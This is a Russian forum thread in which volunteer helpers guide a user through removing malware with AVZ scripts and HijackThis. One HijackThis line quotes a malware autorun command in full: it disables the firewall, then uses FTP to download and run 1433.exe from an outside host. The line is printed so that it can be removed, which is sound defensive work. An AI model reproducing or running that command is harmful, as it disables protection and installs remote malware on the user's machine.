Это логи после лечения AVZ . У меня есть предположение чьто после лечения остались коекакие хвосты. Помогите пожалуйста разобратся. Да ищё в диспечере устройств новое неопознаное устройство ROOT\LEGACY_UZE4ODKX\0000
Printable View
Это логи после лечения AVZ . У меня есть предположение чьто после лечения остались коекакие хвосты. Помогите пожалуйста разобратся. Да ищё в диспечере устройств новое неопознаное устройство ROOT\LEGACY_UZE4ODKX\0000
Уважаемый(ая) [B]unforgiven101077[/B], спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/donate/"]поддержите проект[/URL].
Здравствуйте.
Отключите:
-ПК от интернета
-Все защитные приложения
Выполните скрипт в AVZ:
[CODE]
begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
TerminateProcessByName('c:\cashwriter\cash.exe');
QuarantineFile('c:\windows\aq.bat','');
QuarantineFile('c:\cashwriter\cash.exe','');
QuarantineFile('C:\WINDOWS\System32\tcpwakvlib.exe','');
QuarantineFile('C:\WINDOWS\V2011.exe','');
DeleteFile('c:\windows\aq.bat');
DeleteFile('C:\WINDOWS\System32\tcpwakvlib.exe');
RegKeyParamWrite('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Command Processor', 'AutoRun', 'REG_SZ', '');
BC_ImportAll;
ExecuteSysClean;
BC_DeleteSvc('WakvSvc');
ExecuteRepair(9);
ExecuteWizard('TSW',2,3,true);
BC_Activate;
RebootWindows(true);
end.
[/CODE]
Компьютер перезагрузится.
Затем выполните ещё один скрипт:
[CODE]begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.[/CODE]
И пришлите quarantine.zip из папки AVZ согласно правилам (через красную ссылку "[B][COLOR="Red"][U]Прислать запрошенный карантин[/U][/COLOR][/B]" наверху темы).
Сделайте повторные логи.
Сделайте [URL="http://virusinfo.info/showthread.php?t=53070"]лог MBAM[/URL].
ВЫсылаю повторные логи , проблема с ROOT\LEGACY_UZE4ODKX\0000 пока сохранилась и ищё при запуке появилось ищё какоето окно с 1433.ехе в вложеной картинке окно после перезапуска системы после выполнения скрипта AVZ
Пофиксите в HijackThis:
[CODE]O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open up.hackeyes.com > cmd.txt&echo 110>> cmd.txt&echo 110>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&del cmd.t[/CODE]
Выполните скрипт в AVZ:
[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
DeleteFile('C:\WINDOWS\V2011.exe');
RegKeyParamDel('HKEY_USERS','.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run','V2011');
RegKeyParamDel('HKEY_USERS','S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run','V2011');
BC_ImportAll;
ExecuteSysClean;
ExecuteWizard('TSW',2,3,true);
BC_Activate;
RebootWindows(true);
end.[/CODE]
Сделайте повторные логи.
Вот повторные логи, осталась только проблема с новым оборудыванием
Чисто.
Попытайтесь удалить новое оборудование.
Спасибо щас попробую удалить новое оборудование
[size="1"][color="#666686"][B][I]Добавлено через 8 минут[/I][/B][/color][/size]
Большое спасибо всё работает нормально тему можно закрывать